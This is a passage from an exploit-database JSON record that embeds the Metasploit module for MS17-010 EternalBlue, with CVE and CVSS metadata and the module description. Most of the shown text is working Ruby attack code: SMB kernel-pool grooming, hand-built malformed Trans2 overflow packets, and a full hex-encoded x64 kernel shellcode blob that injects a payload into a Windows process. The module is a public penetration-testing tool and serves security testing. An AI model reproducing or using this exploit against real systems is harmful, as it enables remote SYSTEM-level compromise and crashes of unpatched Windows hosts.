for OS indicated by SMB reply')\n else\n print_warning('Target OS selected not valid for OS indicated by SMB reply')\n print_warning('Disable VerifyTarget option to proceed manually...')\n raise EternalBlueError, 'Unable to continue with improper OS Target.'\n end\n\n # cool buffer print no matter what, will be helpful when people post debug issues\n print_core_buffer(os)\n\n if verify_arch\n print_good('Target arch selected valid for arch indicated by DCE/RPC reply')\n else\n print_warning('Target arch selected not valid for arch indicated by DCE/RPC reply')\n print_warning('Disable VerifyArch option to proceed manually...')\n raise EternalBlueError, 'Unable to continue with improper OS Arch.'\n end\n\n print_status(\"Trying exploit with #{grooms} Groom Allocations.\")\n\n # Step 2: Create a large SMB1 buffer\n print_status(\"Sending all but last fragment of exploit packet\")\n smb1_large_buffer(client, tree, sock)\n\n # Step 3: Groom the pool with payload packets, and open/close SMB1 packets\n print_status(\"Starting non-paged pool grooming\")\n\n # initialize_groom_threads(ip, port, payload, grooms)\n fhs_sock = smb1_free_hole(true)\n\n @groom_socks = []\n\n print_good(\"Sending SMBv2 buffers\")\n smb2_grooms(grooms, payload_hdr_pkt)\n\n fhf_sock = smb1_free_hole(false)\n\n print_good(\"Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.\")\n fhs_sock.shutdown()\n\n print_status(\"Sending final SMBv2 buffers.\") # 6x\n smb2_grooms(6, payload_hdr_pkt) # todo: magic #\n\n fhf_sock.shutdown()\n\n print_status(\"Sending last fragment of exploit packet!\")\n final_exploit_pkt = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_exploit, 15)\n sock.put(final_exploit_pkt)\n\n print_status(\"Receiving response from exploit packet\")\n code, raw = smb1_get_response(sock)\n\n code_str = \"0x\" + code.to_i.to_s(16).upcase\n if code.nil?\n print_error(\"Did not receive a response from exploit packet\")\n elsif code == 0xc000000d # 
STATUS_INVALID_PARAMETER (0xC000000D)\n print_good(\"ETERNALBLUE overwrite completed successfully (#{code_str})!\")\n else\n print_warning(\"ETERNALBLUE overwrite returned unexpected status code (#{code_str})!\")\n end\n\n # Step 4: Send the payload\n print_status(\"Sending egg to corrupted connection.\")\n\n @groom_socks.each{ |gsock| gsock.put(payload_body_pkt.first(2920)) }\n @groom_socks.each{ |gsock| gsock.put(payload_body_pkt[2920..(4204 - 0x84)]) }\n\n print_status(\"Triggering free of corrupted buffer.\")\n # tree disconnect\n # logoff and x\n # note: these aren't necessary, just close the sockets\n return true\n ensure\n abort_sockets\n end\n end\n\n def verify_target(os)\n os = os.gsub(\"\\x00\", '') # strip unicode bs\n os << \"\\x00\" # but original has a null\n ret = true\n\n if datastore['VerifyTarget']\n ret = false\n # search if its in patterns\n target['os_patterns'].each do |pattern|\n if os.downcase.include? pattern.downcase\n ret = true\n break\n end\n end\n end\n\n return ret\n end\n\n def verify_arch\n return true unless datastore['VerifyArch']\n\n # XXX: This sends a new DCE/RPC packet\n arch = dcerpc_getarch\n\n return true if arch && arch == target_arch.first\n\n print_warning(\"Target arch is #{target_arch.first}, but server returned #{arch.inspect}\")\n print_warning(\"The DCE/RPC service or probe may be blocked\") if arch.nil?\n false\n end\n\n def print_core_buffer(os)\n print_status(\"CORE raw buffer dump (#{os.length.to_s} bytes)\")\n\n count = 0\n chunks = os.scan(/.{1,16}/)\n chunks.each do | chunk |\n hexdump = chunk.chars.map { |ch| ch.ord.to_s(16).rjust(2, \"0\") }.join(\" \")\n\n format = \"0x%08x %-47s %-16s\" % [(count * 16), hexdump, chunk]\n print_status(format)\n count += 1\n end\n end\n\n '''\n #\n # Increase the default delay by five seconds since some kernel-mode\n # payloads may not run immediately.\n #\n def wfs_delay\n super + 5\n end\n '''\n\n def smb2_grooms(grooms, payload_hdr_pkt)\n grooms.times do |groom_id|\n 
gsock = connect(false)\n @groom_socks << gsock\n gsock.put(payload_hdr_pkt)\n end\n end\n\n def smb1_anonymous_connect_ipc\n sock = connect(false)\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, domain: smb_domain, password: smb_pass)\n response_code = client.login\n\n unless response_code == ::WindowsError::NTStatus::STATUS_SUCCESS\n raise RubySMB::Error::UnexpectedStatusCode, \"Error with login: #{response_code.to_s}\"\n end\n os = client.peer_native_os\n\n tree = client.tree_connect(\"\\\\\\\\#{datastore['RHOST']}\\\\IPC$\")\n\n return client, tree, sock, os\n end\n\n def smb1_large_buffer(client, tree, sock)\n nt_trans_pkt = make_smb1_nt_trans_packet(tree.id, client.user_id)\n\n # send NT Trans\n vprint_status(\"Sending NT Trans Request packet\")\n\n client.send_recv(nt_trans_pkt)\n # Initial Trans2 request\n trans2_pkt_nulled = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_zero, 0)\n\n # send all but last packet\n for i in 1..14\n trans2_pkt_nulled << make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_buffer, i)\n end\n\n vprint_status(\"Sending malformed Trans2 packets\")\n sock.put(trans2_pkt_nulled)\n\n begin\n sock.get_once\n rescue EOFError\n vprint_error(\"No response back from SMB echo request. 
Continuing anyway...\")\n end\n\n client.echo(count:1, data: \"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x00\")\n end\n\n def smb1_free_hole(start)\n sock = connect(false)\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, domain: smb_domain, password: smb_pass)\n client.negotiate\n\n pkt = \"\"\n\n if start\n vprint_status(\"Sending start free hole packet.\")\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\xc0\", \"\\x2d\\x01\", \"\\xf0\\xff\\x00\\x00\\x00\")\n else\n vprint_status(\"Sending end free hole packet.\")\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\x40\", \"\\x2c\\x01\", \"\\xf8\\x87\\x00\\x00\\x00\")\n end\n\n client.send_recv(pkt)\n sock\n end\n\n def smb1_get_response(sock)\n raw = nil\n\n # dirty hack since it doesn't always like to reply the first time...\n 16.times do\n raw = sock.get_once\n break unless raw.nil? or raw.empty?\n end\n\n return nil unless raw\n response = RubySMB::SMB1::SMBHeader.read(raw[4..-1])\n code = response.nt_status\n return code, raw, response\n end\n\n def make_smb2_payload_headers_packet\n # don't need a library here, the packet is essentially nonsensical\n pkt = \"\"\n pkt << \"\\x00\" # session message\n pkt << \"\\x00\\xff\\xf7\" # size\n pkt << \"\\xfeSMB\" # SMB2\n pkt << \"\\x00\" * 124\n\n pkt\n end\n\n def make_smb2_payload_body_packet(kernel_user_payload)\n # precalculated lengths\n pkt_max_len = 4204\n pkt_setup_len = 497\n pkt_max_payload = pkt_max_len - pkt_setup_len # 3575\n\n # this packet holds padding, KI_USER_SHARED_DATA addresses, and shellcode\n pkt = \"\"\n\n # padding\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x03\\x00\\x00\\x00\"\n pkt << \"\\x00\" * 0x1c\n pkt << \"\\x03\\x00\\x00\\x00\"\n pkt << \"\\x00\" * 0x74\n\n # KI_USER_SHARED_DATA addresses\n pkt << \"\\xb0\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\" * 2 # x64 address\n pkt << \"\\x00\" * 0x10\n pkt << \"\\xc0\\xf0\\xdf\\xff\" * 2 # x86 
address\n pkt << \"\\x00\" * 0xc4\n\n # payload addreses\n pkt << \"\\x90\\xf1\\xdf\\xff\"\n pkt << \"\\x00\" * 0x4\n pkt << \"\\xf0\\xf1\\xdf\\xff\"\n pkt << \"\\x00\" * 0x40\n\n pkt << \"\\xf0\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x00\\x02\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\"\n\n pkt << kernel_user_payload\n\n # fill out the rest, this can be randomly generated\n pkt << \"\\x00\" * (pkt_max_payload - kernel_user_payload.length)\n\n pkt\n end\n\n # Type can be :eb_trans2_zero, :eb_trans2_buffer, or :eb_trans2_exploit\n def make_smb1_trans2_exploit_packet(tree_id, user_id, type, timeout)\n timeout = (timeout * 0x10) + 3\n timeout_value = \"\\x35\\x00\\xd0\" + timeout.chr\n\n packet = RubySMB::SMB1::Packet::Trans2::Request.new\n packet = set_smb1_headers(packet, tree_id, user_id)\n\n # The packets are labeled as Secondary Requests but are actually structured\n # as normal Trans2 Requests for some reason. We shall similarly cheat here.\n packet.smb_header.command = RubySMB::SMB1::Commands::SMB_COM_TRANSACTION2_SECONDARY\n\n packet.parameter_block.flags.read(\"\\x00\\x10\")\n packet.parameter_block.timeout.read(timeout_value)\n\n packet.parameter_block.word_count = 9\n packet.parameter_block.total_data_count = 4096\n packet.parameter_block.parameter_count = 4096\n\n nbss = \"\\x00\\x00\\x10\\x35\"\n pkt = packet.to_binary_s\n pkt = pkt[0,packet.parameter_block.parameter_offset.abs_offset]\n pkt = nbss + pkt\n\n case type\n when :eb_trans2_exploit\n vprint_status(\"Making :eb_trans2_exploit packet\")\n\n pkt << \"\\x41\" * 2957\n\n pkt << \"\\x80\\x00\\xa8\\x00\" # overflow\n\n pkt << \"\\x00\" * 0x10\n pkt << \"\\xff\\xff\"\n pkt << \"\\x00\" * 0x6\n pkt << \"\\xff\\xff\"\n pkt << \"\\x00\" * 0x16\n\n pkt << \"\\x00\\xf1\\xdf\\xff\" # x86 addresses\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x20\\xf0\\xdf\\xff\"\n\n pkt << \"\\x00\\xf1\\xdf\\xff\\xff\\xff\\xff\\xff\" # x64\n\n pkt << \"\\x60\\x00\\x04\\x10\"\n pkt << 
\"\\x00\" * 4\n\n pkt << \"\\x80\\xef\\xdf\\xff\"\n\n pkt << \"\\x00\" * 4\n pkt << \"\\x10\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x18\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x10\n\n pkt << \"\\x60\\x00\\x04\\x10\"\n pkt << \"\\x00\" * 0xc\n pkt << \"\\x90\\xff\\xcf\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x80\\x10\"\n pkt << \"\\x00\" * 0xe\n pkt << \"\\x39\"\n pkt << \"\\xbb\"\n\n pkt << \"\\x41\" * 965\n when :eb_trans2_zero\n vprint_status(\"Making :eb_trans2_zero packet\")\n pkt << \"\\x00\" * 2055\n pkt << \"\\x83\\xf3\"\n pkt << \"\\x41\" * 2039\n else\n vprint_status(\"Making :eb_trans2_buffer packet\")\n pkt << \"\\x41\" * 4096\n end\n pkt\n end\n\n def make_smb1_nt_trans_packet(tree_id, user_id)\n packet = RubySMB::SMB1::Packet::NtTrans::Request.new\n\n # Disable the automatic padding because it will distort\n # our values here.\n packet.data_block.enable_padding = false\n\n packet = set_smb1_headers(packet, tree_id, user_id)\n\n packet.parameter_block.max_setup_count = 1\n packet.parameter_block.total_parameter_count = 30\n packet.parameter_block.total_data_count = 66512\n packet.parameter_block.max_parameter_count = 30\n packet.parameter_block.max_data_count = 0\n packet.parameter_block.parameter_count = 30\n packet.parameter_block.parameter_offset = 75\n packet.parameter_block.data_count = 976\n packet.parameter_block.data_offset = 104\n packet.parameter_block.function = 0\n\n packet.parameter_block.setup << 0x0000\n\n packet.data_block.byte_count = 1004\n packet.data_block.trans2_parameters = \"\\x00\" * 31 + \"\\x01\" + (\"\\x00\" * 973)\n packet\n end\n\n def make_smb1_free_hole_session_packet(flags2, vcnum, native_os)\n packet = RubySMB::SMB1::Packet::SessionSetupRequest.new\n\n packet.smb_header.flags.read(\"\\x18\")\n packet.smb_header.flags2.read(flags2)\n packet.smb_header.pid_high = 65279\n packet.smb_header.mid = 64\n\n packet.parameter_block.vc_number.read(vcnum)\n 
packet.parameter_block.max_buffer_size = 4356\n packet.parameter_block.max_mpx_count = 10\n packet.parameter_block.security_blob_length = 0\n\n packet.data_block.native_os = native_os\n packet.data_block.native_lan_man = \"\\x00\" * 17\n packet\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n # ep_thl_b = EPROCESS.ThreadListHead.Blink offset\n # et_alertable = ETHREAD.Alertable offset\n # teb_acp = TEB.ActivationContextPointer offset\n # et_tle = ETHREAD.ThreadListEntry offset\n def make_kernel_user_payload(ring3, proc_name, ep_thl_b, et_alertable, teb_acp, et_tle)\n sc = make_kernel_shellcode(proc_name)\n sc << [ring3.length].pack(\"S<\")\n sc << ring3\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 1019 bytes\n\n # \"\\xcc\"+\n \"\\x31\\xC9\\x41\\xE2\\x01\\xC3\\xB9\\x82\\x00\\x00\\xC0\\x0F\\x32\\x48\\xBB\\xF8\" +\n \"\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x89\\x53\\x04\\x89\\x03\\x48\\x8D\\x05\\x0A\" +\n \"\\x00\\x00\\x00\\x48\\x89\\xC2\\x48\\xC1\\xEA\\x20\\x0F\\x30\\xC3\\x0F\\x01\\xF8\" +\n \"\\x65\\x48\\x89\\x24\\x25\\x10\\x00\\x00\\x00\\x65\\x48\\x8B\\x24\\x25\\xA8\\x01\" +\n \"\\x00\\x00\\x50\\x53\\x51\\x52\\x56\\x57\\x55\\x41\\x50\\x41\\x51\\x41\\x52\\x41\" +\n \"\\x53\\x41\\x54\\x41\\x55\\x41\\x56\\x41\\x57\\x6A\\x2B\\x65\\xFF\\x34\\x25\\x10\" +\n \"\\x00\\x00\\x00\\x41\\x53\\x6A\\x33\\x51\\x4C\\x89\\xD1\\x48\\x83\\xEC\\x08\\x55\" +\n \"\\x48\\x81\\xEC\\x58\\x01\\x00\\x00\\x48\\x8D\\xAC\\x24\\x80\\x00\\x00\\x00\\x48\" +\n 
\"\\x89\\x9D\\xC0\\x00\\x00\\x00\\x48\\x89\\xBD\\xC8\\x00\\x00\\x00\\x48\\x89\\xB5\" +\n \"\\xD0\\x00\\x00\\x00\\x48\\xA1\\xF8\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x48\\x89\" +\n \"\\xC2\\x48\\xC1\\xEA\\x20\\x48\\x31\\xDB\\xFF\\xCB\\x48\\x21\\xD8\\xB9\\x82\\x00\" +\n \"\\x00\\xC0\\x0F\\x30\\xFB\\xE8\\x38\\x00\\x00\\x00\\xFA\\x65\\x48\\x8B\\x24\\x25\" +\n \"\\xA8\\x01\\x00\\x00\\x48\\x83\\xEC\\x78\\x41\\x5F\\x41\\x5E\\x41\\x5D\\x41\\x5C\" +\n \"\\x41\\x5B\\x41\\x5A\\x41\\x59\\x41\\x58\\x5D\\x5F\\x5E\\x5A\\x59\\x5B\\x58\\x65\" +\n \"\\x48\\x8B\\x24\\x25\\x10\\x00\\x00\\x00\\x0F\\x01\\xF8\\xFF\\x24\\x25\\xF8\\x0F\" +\n \"\\xD0\\xFF\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\\x55\\x48\\x89\\xE5\" +\n \"\\x66\\x83\\xE4\\xF0\\x48\\x83\\xEC\\x20\\x4C\\x8D\\x35\\xE3\\xFF\\xFF\\xFF\\x65\" +\n \"\\x4C\\x8B\\x3C\\x25\\x38\\x00\\x00\\x00\\x4D\\x8B\\x7F\\x04\\x49\\xC1\\xEF\\x0C\" +\n \"\\x49\\xC1\\xE7\\x0C\\x49\\x81\\xEF\\x00\\x10\\x00\\x00\\x49\\x8B\\x37\\x66\\x81\" +\n \"\\xFE\\x4D\\x5A\\x75\\xEF\\x41\\xBB\\x5C\\x72\\x11\\x62\\xE8\\x18\\x02\\x00\\x00\" +\n \"\\x48\\x89\\xC6\\x48\\x81\\xC6\\x08\\x03\\x00\\x00\\x41\\xBB\\x7A\\xBA\\xA3\\x30\" +\n \"\\xE8\\x03\\x02\\x00\\x00\\x48\\x89\\xF1\\x48\\x39\\xF0\\x77\\x11\\x48\\x8D\\x90\" +\n \"\\x00\\x05\\x00\\x00\\x48\\x39\\xF2\\x72\\x05\\x48\\x29\\xC6\\xEB\\x08\\x48\\x8B\" +\n \"\\x36\\x48\\x39\\xCE\\x75\\xE2\\x49\\x89\\xF4\\x31\\xDB\\x89\\xD9\\x83\\xC1\\x04\" +\n \"\\x81\\xF9\\x00\\x00\\x01\\x00\\x0F\\x8D\\x66\\x01\\x00\\x00\\x4C\\x89\\xF2\\x89\" +\n \"\\xCB\\x41\\xBB\\x66\\x55\\xA2\\x4B\\xE8\\xBC\\x01\\x00\\x00\\x85\\xC0\\x75\\xDB\" +\n \"\\x49\\x8B\\x0E\\x41\\xBB\\xA3\\x6F\\x72\\x2D\\xE8\\xAA\\x01\\x00\\x00\\x48\\x89\" +\n \"\\xC6\\xE8\\x50\\x01\\x00\\x00\\x41\\x81\\xF9\" + generate_process_hash(proc_name.upcase) + \"\\x75\\xBC\\x49\" +\n \"\\x8B\\x1E\\x4D\\x8D\\x6E\\x10\\x4C\\x89\\xEA\\x48\\x89\\xD9\\x41\\xBB\\xE5\\x24\" +\n \"\\x11\\xDC\\xE8\\x81\\x01\\x00\\x00\\x6A\\x40\\x68\\x00\\x10\\x00\\x00\\x4D\\x8D\" +\n 
\"\\x4E\\x08\\x49\\xC7\\x01\\x00\\x10\\x00\\x00\\x4D\\x31\\xC0\\x4C\\x89\\xF2\\x31\" +\n \"\\xC9\\x48\\x89\\x0A\\x48\\xF7\\xD1\\x41\\xBB\\x4B\\xCA\\x0A\\xEE\\x48\\x83\\xEC\" +\n \"\\x20\\xE8\\x52\\x01\\x00\\x00\\x85\\xC0\\x0F\\x85\\xC8\\x00\\x00\\x00\\x49\\x8B\" +\n \"\\x3E\\x48\\x8D\\x35\\xE9\\x00\\x00\\x00\\x31\\xC9\\x66\\x03\\x0D\\xD7\\x01\\x00\" +\n \"\\x00\\x66\\x81\\xC1\\xF9\\x00\\xF3\\xA4\\x48\\x89\\xDE\\x48\\x81\\xC6\\x08\\x03\" +\n \"\\x00\\x00\\x48\\x89\\xF1\\x48\\x8B\\x11\\x4C\\x29\\xE2\\x51\\x52\\x48\\x89\\xD1\" +\n \"\\x48\\x83\\xEC\\x20\\x41\\xBB\\x26\\x40\\x36\\x9D\\xE8\\x09\\x01\\x00\\x00\\x48\" +\n \"\\x83\\xC4\\x20\\x5A\\x59\\x48\\x85\\xC0\\x74\\x18\\x48\\x8B\\x80\\xC8\\x02\\x00\" +\n \"\\x00\\x48\\x85\\xC0\\x74\\x0C\\x48\\x83\\xC2\\x4C\\x8B\\x02\\x0F\\xBA\\xE0\\x05\" +\n \"\\x72\\x05\\x48\\x8B\\x09\\xEB\\xBE\\x48\\x83\\xEA\\x4C\\x49\\x89\\xD4\\x31\\xD2\" +\n \"\\x80\\xC2\\x90\\x31\\xC9\\x41\\xBB\\x26\\xAC\\x50\\x91\\xE8\\xC8\\x00\\x00\\x00\" +\n \"\\x48\\x89\\xC1\\x4C\\x8D\\x89\\x80\\x00\\x00\\x00\\x41\\xC6\\x01\\xC3\\x4C\\x89\" +\n \"\\xE2\\x49\\x89\\xC4\\x4D\\x31\\xC0\\x41\\x50\\x6A\\x01\\x49\\x8B\\x06\\x50\\x41\" +\n \"\\x50\\x48\\x83\\xEC\\x20\\x41\\xBB\\xAC\\xCE\\x55\\x4B\\xE8\\x98\\x00\\x00\\x00\" +\n \"\\x31\\xD2\\x52\\x52\\x41\\x58\\x41\\x59\\x4C\\x89\\xE1\\x41\\xBB\\x18\\x38\\x09\" +\n \"\\x9E\\xE8\\x82\\x00\\x00\\x00\\x4C\\x89\\xE9\\x41\\xBB\\x22\\xB7\\xB3\\x7D\\xE8\" +\n \"\\x74\\x00\\x00\\x00\\x48\\x89\\xD9\\x41\\xBB\\x0D\\xE2\\x4D\\x85\\xE8\\x66\\x00\" +\n \"\\x00\\x00\\x48\\x89\\xEC\\x5D\\x5B\\x41\\x5C\\x41\\x5D\\x41\\x5E\\x41\\x5F\\x5E\" +\n \"\\xC3\\xE9\\xB5\\x00\\x00\\x00\\x4D\\x31\\xC9\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\" +\n \"\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\x01\\xC1\\x38\\xE0\\x75\\xEC\\xC3\\x31\\xD2\" +\n \"\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\\x20\\x48\\x8B\\x12\" +\n \"\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x45\\x31\\xC9\\x31\\xC0\\xAC\\x3C\" +\n 
\"\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xEE\\x45\\x39\" +\n \"\\xD9\\x75\\xDA\\x4C\\x8B\\x7A\\x20\\xC3\\x4C\\x89\\xF8\\x41\\x51\\x41\\x50\\x52\" +\n \"\\x51\\x56\\x48\\x89\\xC2\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\\x00\\x00\" +\n \"\\x00\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\\x8B\\x40\\x20\\x49\\x01\\xD0\\x48\" +\n \"\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\\x01\\xD6\\xE8\\x78\\xFF\\xFF\\xFF\\x45\\x39\" +\n \"\\xD9\\x75\\xEC\\x58\\x44\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\" +\n \"\\x44\\x8B\\x40\\x1C\\x49\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x5E\\x59\" +\n \"\\x5A\\x41\\x58\\x41\\x59\\x41\\x5B\\x41\\x53\\xFF\\xE0\\x56\\x41\\x57\\x55\\x48\" +\n \"\\x89\\xE5\\x48\\x83\\xEC\\x20\\x41\\xBB\\xDA\\x16\\xAF\\x92\\xE8\\x4D\\xFF\\xFF\" +\n \"\\xFF\\x31\\xC9\\x51\\x51\\x51\\x51\\x41\\x59\\x4C\\x8D\\x05\\x1A\\x00\\x00\\x00\" +\n \"\\x5A\\x48\\x83\\xEC\\x20\\x41\\xBB\\x46\\x45\\x1B\\x22\\xE8\\x68\\xFF\\xFF\\xFF\" +\n \"\\x48\\x89\\xEC\\x5D\\x41\\x5F\\x5E\\xC3\"#\\x01\\x00\\xC3\"\n end\n\n # Sets common SMB1 Header values used by the various\n # packets in the exploit.\n #\n # @return [RubySMB::GenericPacket] the modified version of the packet\n def set_smb1_headers(packet, tree_id, user_id)\n packet.smb_header.flags2.read(\"\\x07\\xc0\")\n packet.smb_header.tid = tree_id\n packet.smb_header.uid = user_id\n packet.smb_header.pid_low = 65279\n packet.smb_header.mid = 64\n packet\n end\n\n # Returns the value to be passed to SMB clients for\n # the password. If the user has not supplied a password\n # it returns an empty string to trigger an anonymous\n # logon.\n #\n # @return [String] the password value\n def smb_pass\n if datastore['SMBPass'].present?\n datastore['SMBPass']\n else\n ''\n end\n end\n\n # Returns the value to be passed to SMB clients for\n # the username. 
If the user has not supplied a username\n # it returns an empty string to trigger an anonymous\n # logon.\n #\n # @return [String] the username value\n def smb_user\n if datastore['SMBUser'].present?\n datastore['SMBUser']\n else\n ''\n end\n end\n\n # Returns the value to be passed to SMB clients for\n # the domain. If the user has not supplied a domain\n # it returns an empty string to trigger an anonymous\n # logon.\n #\n # @return [String] the domain value\n def smb_domain\n if datastore['SMBDomain'].present?\n datastore['SMBDomain']\n else\n ''\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption", "type": "metasploit", "viewCount": 2797}, "differentElements": ["sourceData"], "edition": 57, "lastseen": "2018-11-24T14:34:23"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. 
If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. This may be more likely with some payloads.", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "lastseen": "2018-06-04T19:48:49", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb", "metasploitReliability": "Average", "modified": "2018-04-25T08:57:12", "objectVersion": "1.4", "published": "2017-05-24T21:09:51", "references": [], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'ruby_smb'\nrequire 'ruby_smb/smb1/packet'\nrequire 'windows_error'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::DCERPC\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',\n 'Description' => %q{\n This module is a port of the Equation Group ETERNALBLUE exploit, part of\n the FuzzBunch toolkit released by Shadow Brokers.\n\n There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size\n is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a\n DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow\n is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later\n completed in srvnet!SrvNetWskReceiveComplete.\n\n This exploit, like the original may not trigger 100% of the time, and should be\n run continuously until triggered. 
It seems like the pool will get hot streaks\n and need a cool down period before the shells rain in again.\n\n The module will attempt to use Anonymous login, by default, to authenticate to perform the\n exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use\n those instead.\n\n On some systems, this module may cause system instability and crashes, such as a BSOD or\n a reboot. This may be more likely with some payloads.\n },\n\n 'Author' => [\n 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0\n 'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius\n 'Equation Group',\n 'Shadow Brokers',\n 'thelightcosine' # RubySMB refactor and Fallback Credential mode\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'AKA', 'ETERNALBLUE' ],\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143' ],\n [ 'CVE', '2017-0144' ],\n [ 'CVE', '2017-0145' ],\n [ 'CVE', '2017-0146' ],\n [ 'CVE', '2017-0147' ],\n [ 'CVE', '2017-0148' ],\n [ 'URL', 'https://github.com/RiskSense-Ops/MS17-010' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'WfsDelay' => 5,\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 2000, # this can be more, needs to be recalculated\n 'EncoderType' => Msf::Encoder::Type::Raw,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows 7 and Server 2008 R2 (x64) All Service Packs',\n {\n 'Platform' => 'win',\n 'Arch' => [ ARCH_X64 ],\n\n 'os_patterns' => ['Server 2008 R2', 'Windows 7'],\n 'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset\n 'et_alertable' => 0x4c, # ETHREAD.Alertable offset\n 'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset\n 'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Mar 14 2017'\n ))\n\n register_options(\n [\n Opt::RPORT(445),\n OptString.new('ProcessName', [ true, 'Process to inject payload into.', 'spoolsv.exe' ]),\n OptInt.new( 'MaxExploitAttempts', [ true, \"The number of times to 
